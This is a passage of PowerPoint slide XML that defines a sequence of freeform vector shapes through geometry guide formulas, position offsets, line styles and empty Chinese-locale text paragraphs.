                <a:gd name="T14" fmla="*/ 6 w 1386"/>
                <a:gd name="T15" fmla="*/ 3 h 753"/>
                <a:gd name="T16" fmla="*/ 6 w 1386"/>
                <a:gd name="T17" fmla="*/ 3 h 753"/>
                <a:gd name="T18" fmla="*/ 2 w 1386"/>
                <a:gd name="T19" fmla="*/ 1 h 753"/>
                <a:gd name="T20" fmla="*/ 1 w 1386"/>
                <a:gd name="T21" fmla="*/ 2 h 753"/>
                <a:gd name="T22" fmla="*/ 0 w 1386"/>
                <a:gd name="T23" fmla="*/ 1 h 753"/>
                <a:gd name="T24" fmla="*/ 0 w 1386"/>
                <a:gd name="T25" fmla="*/ 1 h 753"/>
                <a:gd name="T26" fmla="*/ 0 w 1386"/>
                <a:gd name="T27" fmla="*/ 1 h 753"/>
                <a:gd name="T28" fmla="*/ 0 w 1386"/>
                <a:gd name="T29" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1060" name="Freeform 33"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="452" y="3236"/>
              <a:ext cx="450" cy="246"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1351"/>
                <a:gd name="T1" fmla="*/ 0 h 740"/>
                <a:gd name="T2" fmla="*/ 1 w 1351"/>
                <a:gd name="T3" fmla="*/ 0 h 740"/>
                <a:gd name="T4" fmla="*/ 1 w 1351"/>
                <a:gd name="T5" fmla="*/ 0 h 740"/>
                <a:gd name="T6" fmla="*/ 1 w 1351"/>
                <a:gd name="T7" fmla="*/ 0 h 740"/>
                <a:gd name="T8" fmla="*/ 1 w 1351"/>
                <a:gd name="T9" fmla="*/ 0 h 740"/>
                <a:gd name="T10" fmla="*/ 2 w 1351"/>
                <a:gd name="T11" fmla="*/ 0 h 740"/>
                <a:gd name="T12" fmla="*/ 2 w 1351"/>
                <a:gd name="T13" fmla="*/ 1 h 740"/>
                <a:gd name="T14" fmla="*/ 6 w 1351"/>
                <a:gd name="T15" fmla="*/ 3 h 740"/>
                <a:gd name="T16" fmla="*/ 5 w 1351"/>
                <a:gd name="T17" fmla="*/ 3 h 740"/>
                <a:gd name="T18" fmla="*/ 1 w 1351"/>
                <a:gd name="T19" fmla="*/ 1 h 740"/>
                <a:gd name="T20" fmla="*/ 1 w 1351"/>
                <a:gd name="T21" fmla="*/ 2 h 740"/>
                <a:gd name="T22" fmla="*/ 0 w 1351"/>
                <a:gd name="T23" fmla="*/ 1 h 740"/>
                <a:gd name="T24" fmla="*/ 0 w 1351"/>
                <a:gd name="T25" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1061" name="Freeform 34"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="799" y="3709"/>
              <a:ext cx="326" cy="31"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 980"/>
                <a:gd name="T1" fmla="*/ 0 h 93"/>
                <a:gd name="T2" fmla="*/ 4 w 980"/>
                <a:gd name="T3" fmla="*/ 0 h 93"/>
                <a:gd name="T4" fmla="*/ 3 w 980"/>
                <a:gd name="T5" fmla="*/ 0 h 93"/>
                <a:gd name="T6" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1062" name="Freeform 35"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="760" y="3028"/>
              <a:ext cx="740" cy="702"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 2219"/>
                <a:gd name="T1" fmla="*/ 6 h 2108"/>
                <a:gd name="T2" fmla="*/ 1 w 2219"/>
                <a:gd name="T3" fmla="*/ 7 h 2108"/>
                <a:gd name="T4" fmla="*/ 1 w 2219"/>
                <a:gd name="T5" fmla="*/ 7 h 2108"/>
                <a:gd name="T6" fmla="*/ 2 w 2219"/>
                <a:gd name="T7" fmla="*/ 7 h 2108"/>
                <a:gd name="T8" fmla="*/ 0 w 2219"/>
                <a:gd name="T9" fmla="*/ 7 h 2108"/>
                <a:gd name="T10" fmla="*/ 1 w 2219"/>
                <a:gd name="T11" fmla="*/ 8 h 2108"/>
                <a:gd name="T12" fmla="*/ 2 w 2219"/>
                <a:gd name="T13" fmla="*/ 8 h 2108"/>
                <a:gd name="T14" fmla="*/ 3 w 2219"/>
                <a:gd name="T15" fmla="*/ 8 h 2108"/>
                <a:gd name="T16" fmla="*/ 4 w 2219"/>
                <a:gd name="T17" fmla="*/ 8 h 2108"/>
                <a:gd name="T18" fmla="*/ 6 w 2219"/>
                <a:gd name="T19" fmla="*/ 9 h 2108"/>
                <a:gd name="T20" fmla="*/ 7 w 2219"/>
                <a:gd name="T21" fmla="*/ 9 h 2108"/>
                <a:gd name="T22" fmla="*/ 8 w 2219"/>
                <a:gd name="T23" fmla="*/ 8 h 2108"/>
                <a:gd name="T24" fmla="*/ 8 w 2219"/>
                <a:gd name="T25" fmla="*/ 8 h 2108"/>
                <a:gd name="T26" fmla="*/ 9 w 2219"/>
                <a:gd name="T27" fmla="*/ 5 h 2108"/>
                <a:gd name="T28" fmla="*/ 9 w 2219"/>
                <a:gd name="T29" fmla="*/ 4 h 2108"/>
                <a:gd name="T30" fmla="*/ 9 w 2219"/>
                <a:gd name="T31" fmla="*/ 3 h 2108"/>
                <a:gd name="T32" fmla="*/ 9 w 2219"/>
                <a:gd name="T33" fmla="*/ 0 h 2108"/>
                <a:gd name="T34" fmla="*/ 9 w 2219"/>
                <a:gd name="T35" fmla="*/ 1 h 2108"/>
                <a:gd name="T36" fmla="*/ 7 w 2219"/>
                <a:gd name="T37" fmla="*/ 6 h 2108"/>
                <a:gd name="T38" fmla="*/ 7 w 2219"/>
                <a:gd name="T39" fmla="*/ 6 h 2108"/>
                <a:gd name="T40" fmla="*/ 7 w 2219"/>
                <a:gd name="T41" fmla="*/ 5 h 2108"/>
                <a:gd name="T42" fmla="*/ 7 w 2219"/>
                <a:gd name="T43" fmla="*/ 4 h 2108"/>
                <a:gd name="T44" fmla="*/ 7 w 2219"/>
                <a:gd name="T45" fmla="*/ 5 h 2108"/>
                <a:gd name="T46" fmla="*/ 6 w 2219"/>
                <a:gd name="T47" fmla="*/ 6 h 2108"/>
                <a:gd name="T48" fmla="*/ 5 w 2219"/>
                <a:gd name="T49" fmla="*/ 7 h 2108"/>
                <a:gd name="T50" fmla="*/ 4 w 2219"/>
                <a:gd name="T51" fmla="*/ 7 h 2108"/>
                <a:gd name="T52" fmla="*/ 2 w 2219"/>
                <a:gd name="T53" fmla="*/ 7 h 2108"/>
                <a:gd name="T54" fmla="*/ 1 w 2219"/>
                <a:gd name="T55" fmla="*/ 7 h 2108"/>
                <a:gd name="T56" fmla="*/ 1 w 2219"/>
                <a:gd name="T57" fmla="*/ 6 h 2108"/>
                <a:gd name="T58" fmla="*/ 1 w 2219"/>
                <a:gd name="T59" fmla="*/ 6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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1063" name="Freeform 36"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="498" y="3790"/>
              <a:ext cx="1052" cy="157"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 3155"/>
                <a:gd name="T1" fmla="*/ 1 h 470"/>
                <a:gd name="T2" fmla="*/ 12 w 3155"/>
                <a:gd name="T3" fmla="*/ 1 h 470"/>
                <a:gd name="T4" fmla="*/ 12 w 3155"/>
                <a:gd name="T5" fmla="*/ 1 h 470"/>
                <a:gd name="T6" fmla="*/ 13 w 3155"/>
                <a:gd name="T7" fmla="*/ 0 h 470"/>
                <a:gd name="T8" fmla="*/ 13 w 3155"/>
                <a:gd name="T9" fmla="*/ 2 h 470"/>
                <a:gd name="T10" fmla="*/ 12 w 3155"/>
                <a:gd name="T11" fmla="*/ 2 h 470"/>
                <a:gd name="T12" fmla="*/ 1 w 3155"/>
                <a:gd name="T13" fmla="*/ 1 h 470"/>
                <a:gd name="T14" fmla="*/ 0 w 3155"/>
                <a:gd name="T15" fmla="*/ 1 h 470"/>
                <a:gd name="T16" fmla="*/ 0 w 3155"/>
                <a:gd name="T17" fmla="*/ 1 h 470"/>
                <a:gd name="T18" fmla="*/ 0 w 3155"/>
                <a:gd name="T19" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1064" name="Freeform 37"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="828" y="3757"/>
              <a:ext cx="63" cy="31"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 188"/>
                <a:gd name="T1" fmla="*/ 0 h 93"/>
                <a:gd name="T2" fmla="*/ 0 w 188"/>
                <a:gd name="T3" fmla="*/ 0 h 93"/>
                <a:gd name="T4" fmla="*/ 0 w 188"/>
                <a:gd name="T5" fmla="*/ 0 h 93"/>
                <a:gd name="T6" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1065" name="Freeform 38"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="924" y="3762"/>
              <a:ext cx="60" cy="33"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 182"/>
                <a:gd name="T1" fmla="*/ 0 h 98"/>
                <a:gd name="T2" fmla="*/ 0 w 182"/>
                <a:gd name="T3" fmla="*/ 0 h 98"/>
                <a:gd name="T4" fmla="*/ 0 w 182"/>
                <a:gd name="T5" fmla="*/ 0 h 98"/>
                <a:gd name="T6" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1066" name="Freeform 39"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1033" y="3765"/>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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1067" name="Freeform 40"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1134" y="3770"/>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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1068" name="Freeform 41"/>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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1069" name="Freeform 42"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="967" y="3801"/>
              <a:ext cx="62" cy="32"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 188"/>
                <a:gd name="T1" fmla="*/ 0 h 94"/>
                <a:gd name="T2" fmla="*/ 0 w 188"/>
                <a:gd name="T3" fmla="*/ 0 h 94"/>
                <a:gd name="T4" fmla="*/ 0 w 188"/>
                <a:gd name="T5" fmla="*/ 0 h 94"/>
                <a:gd name="T6" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1070" name="Freeform 43"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1062" y="3807"/>
              <a:ext cx="61" cy="33"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 182"/>
                <a:gd name="T1" fmla="*/ 0 h 97"/>
                <a:gd name="T2" fmla="*/ 0 w 182"/>
                <a:gd name="T3" fmla="*/ 0 h 97"/>
                <a:gd name="T4" fmla="*/ 0 w 182"/>
                <a:gd name="T5" fmla="*/ 0 h 97"/>
                <a:gd name="T6" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1071" name="Freeform 44"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1171" y="3810"/>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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1072" name="Freeform 45"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1272" y="3814"/>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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1073" name="Freeform 46"/>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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1074" name="Freeform 47"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="652" y="3823"/>
              <a:ext cx="72" cy="36"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 216"/>
                <a:gd name="T1" fmla="*/ 0 h 108"/>
                <a:gd name="T2" fmla="*/ 0 w 216"/>
                <a:gd name="T3" fmla="*/ 0 h 108"/>
                <a:gd name="T4" fmla="*/ 0 w 216"/>
                <a:gd name="T5" fmla="*/ 0 h 108"/>
                <a:gd name="T6" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1075" name="Freeform 48"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="762" y="3830"/>
              <a:ext cx="71" cy="38"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 212"/>
                <a:gd name="T1" fmla="*/ 0 h 113"/>
                <a:gd name="T2" fmla="*/ 0 w 212"/>
                <a:gd name="T3" fmla="*/ 0 h 113"/>
                <a:gd name="T4" fmla="*/ 0 w 212"/>
                <a:gd name="T5" fmla="*/ 0 h 113"/>
                <a:gd name="T6" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1076" name="Freeform 49"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="888" y="3833"/>
              <a:ext cx="61" cy="43"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 184"/>
                <a:gd name="T1" fmla="*/ 0 h 128"/>
                <a:gd name="T2" fmla="*/ 0 w 184"/>
                <a:gd name="T3" fmla="*/ 0 h 128"/>
                <a:gd name="T4" fmla="*/ 0 w 184"/>
                <a:gd name="T5" fmla="*/ 1 h 128"/>
                <a:gd name="T6" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1077" name="Freeform 50"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1005" y="3838"/>
              <a:ext cx="50" cy="42"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 151"/>
                <a:gd name="T1" fmla="*/ 0 h 126"/>
                <a:gd name="T2" fmla="*/ 0 w 151"/>
                <a:gd name="T3" fmla="*/ 0 h 126"/>
                <a:gd name="T4" fmla="*/ 0 w 151"/>
                <a:gd name="T5" fmla="*/ 1 h 126"/>
                <a:gd name="T6" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1078" name="Freeform 51"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1131" y="3849"/>
              <a:ext cx="46" cy="33"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 138"/>
                <a:gd name="T1" fmla="*/ 0 h 97"/>
                <a:gd name="T2" fmla="*/ 0 w 138"/>
                <a:gd name="T3" fmla="*/ 0 h 97"/>
                <a:gd name="T4" fmla="*/ 0 w 138"/>
                <a:gd name="T5" fmla="*/ 0 h 97"/>
                <a:gd name="T6" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1079" name="Freeform 52"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="758" y="3054"/>
              <a:ext cx="89" cy="99"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 267"/>
                <a:gd name="T1" fmla="*/ 1 h 295"/>
                <a:gd name="T2" fmla="*/ 0 w 267"/>
                <a:gd name="T3" fmla="*/ 0 h 295"/>
                <a:gd name="T4" fmla="*/ 1 w 267"/>
                <a:gd name="T5" fmla="*/ 0 h 295"/>
                <a:gd name="T6" fmla="*/ 1 w 267"/>
                <a:gd name="T7" fmla="*/ 0 h 295"/>
                <a:gd name="T8" fmla="*/ 1 w 267"/>
                <a:gd name="T9" fmla="*/ 0 h 295"/>
                <a:gd name="T10" fmla="*/ 0 w 267"/>
                <a:gd name="T11" fmla="*/ 1 h 295"/>
                <a:gd name="T12" fmla="*/ 0 w 267"/>
                <a:gd name="T13" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1080" name="Freeform 53"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="1267" y="3044"/>
              <a:ext cx="108" cy="128"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 324"/>
                <a:gd name="T1" fmla="*/ 0 h 383"/>
                <a:gd name="T2" fmla="*/ 1 w 324"/>
                <a:gd name="T3" fmla="*/ 0 h 383"/>
                <a:gd name="T4" fmla="*/ 1 w 324"/>
                <a:gd name="T5" fmla="*/ 0 h 383"/>
                <a:gd name="T6" fmla="*/ 1 w 324"/>
                <a:gd name="T7" fmla="*/ 2 h 383"/>
                <a:gd name="T8" fmla="*/ 1 w 324"/>
                <a:gd name="T9" fmla="*/ 1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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1081" name="Freeform 54"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="820" y="3278"/>
              <a:ext cx="490" cy="315"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 1 w 1471"/>
                <a:gd name="T1" fmla="*/ 2 h 944"/>
                <a:gd name="T2" fmla="*/ 1 w 1471"/>
                <a:gd name="T3" fmla="*/ 3 h 944"/>
                <a:gd name="T4" fmla="*/ 1 w 1471"/>
                <a:gd name="T5" fmla="*/ 3 h 944"/>
                <a:gd name="T6" fmla="*/ 1 w 1471"/>
                <a:gd name="T7" fmla="*/ 3 h 944"/>
                <a:gd name="T8" fmla="*/ 0 w 1471"/>
                <a:gd name="T9" fmla="*/ 3 h 944"/>
                <a:gd name="T10" fmla="*/ 1 w 1471"/>
                <a:gd name="T11" fmla="*/ 3 h 944"/>
                <a:gd name="T12" fmla="*/ 2 w 1471"/>
                <a:gd name="T13" fmla="*/ 4 h 944"/>
                <a:gd name="T14" fmla="*/ 4 w 1471"/>
                <a:gd name="T15" fmla="*/ 4 h 944"/>
                <a:gd name="T16" fmla="*/ 5 w 1471"/>
                <a:gd name="T17" fmla="*/ 3 h 944"/>
                <a:gd name="T18" fmla="*/ 6 w 1471"/>
                <a:gd name="T19" fmla="*/ 3 h 944"/>
                <a:gd name="T20" fmla="*/ 6 w 1471"/>
                <a:gd name="T21" fmla="*/ 2 h 944"/>
                <a:gd name="T22" fmla="*/ 6 w 1471"/>
                <a:gd name="T23" fmla="*/ 1 h 944"/>
                <a:gd name="T24" fmla="*/ 6 w 1471"/>
                <a:gd name="T25" fmla="*/ 0 h 944"/>
                <a:gd name="T26" fmla="*/ 6 w 1471"/>
                <a:gd name="T27" fmla="*/ 1 h 944"/>
                <a:gd name="T28" fmla="*/ 5 w 1471"/>
                <a:gd name="T29" fmla="*/ 1 h 944"/>
                <a:gd name="T30" fmla="*/ 6 w 1471"/>
                <a:gd name="T31" fmla="*/ 2 h 944"/>
                <a:gd name="T32" fmla="*/ 6 w 1471"/>
                <a:gd name="T33" fmla="*/ 2 h 944"/>
                <a:gd name="T34" fmla="*/ 5 w 1471"/>
                <a:gd name="T35" fmla="*/ 2 h 944"/>
                <a:gd name="T36" fmla="*/ 5 w 1471"/>
                <a:gd name="T37" fmla="*/ 3 h 944"/>
                <a:gd name="T38" fmla="*/ 4 w 1471"/>
                <a:gd name="T39" fmla="*/ 3 h 944"/>
                <a:gd name="T40" fmla="*/ 4 w 1471"/>
                <a:gd name="T41" fmla="*/ 3 h 944"/>
                <a:gd name="T42" fmla="*/ 3 w 1471"/>
                <a:gd name="T43" fmla="*/ 3 h 944"/>
                <a:gd name="T44" fmla="*/ 3 w 1471"/>
                <a:gd name="T45" fmla="*/ 3 h 944"/>
                <a:gd name="T46" fmla="*/ 2 w 1471"/>
                <a:gd name="T47" fmla="*/ 3 h 944"/>
                <a:gd name="T48" fmla="*/ 2 w 1471"/>
                <a:gd name="T49" fmla="*/ 3 h 944"/>
                <a:gd name="T50" fmla="*/ 2 w 1471"/>
                <a:gd name="T51" fmla="*/ 3 h 944"/>
                <a:gd name="T52" fmla="*/ 2 w 1471"/>
                <a:gd name="T53" fmla="*/ 3 h 944"/>
                <a:gd name="T54" fmla="*/ 3 w 1471"/>
                <a:gd name="T55" fmla="*/ 2 h 944"/>
                <a:gd name="T56" fmla="*/ 3 w 1471"/>
                <a:gd name="T57" fmla="*/ 2 h 944"/>
                <a:gd name="T58" fmla="*/ 1 w 1471"/>
                <a:gd name="T59" fmla="*/ 2 h 944"/>
                <a:gd name="T60" fmla="*/ 1 w 1471"/>
                <a:gd name="T61" fmla="*/ 2 h 944"/>
                <a:gd name="T62" fmla="*/ 1 w 1471"/>
                <a:gd name="T63" fmla="*/ 2 h 944"/>
                <a:gd name="T64" fmla="*/ 1 w 1471"/>
                <a:gd name="T65" fmla="*/ 2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w="9525">
              <a:noFill/>
              <a:round/>
            </a:ln>
          </p:spPr>
          <p:txBody>
            <a:bodyPr/>
            <a:lstStyle/>
            <a:p>
              <a:endParaRPr lang="zh-CN" altLang="en-US"/>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1082" name="Freeform 55"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr bwMode="auto">
            <a:xfrm>
              <a:off x="904" y="3400"/>
              <a:ext cx="341" cy="61"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst>
                <a:gd name="T0" fmla="*/ 0 w 1023"/>
                <a:gd name="T1" fmla="*/ 1 h 182"/>
                <a:gd name="T2" fmla="*/ 1 w 1023"/>
                <a:gd name="T3" fmla="*/ 0 h 182"/>
                <a:gd name="T4" fmla="*/ 2 w 1023"/>
                <a:gd name="T5" fmla="*/ 0 h 182"/>
                <a:gd name="T6" fmla="*/ 3 w 1023"/>
                <a:gd name="T7" fmla="*/ 0 h 182"/>
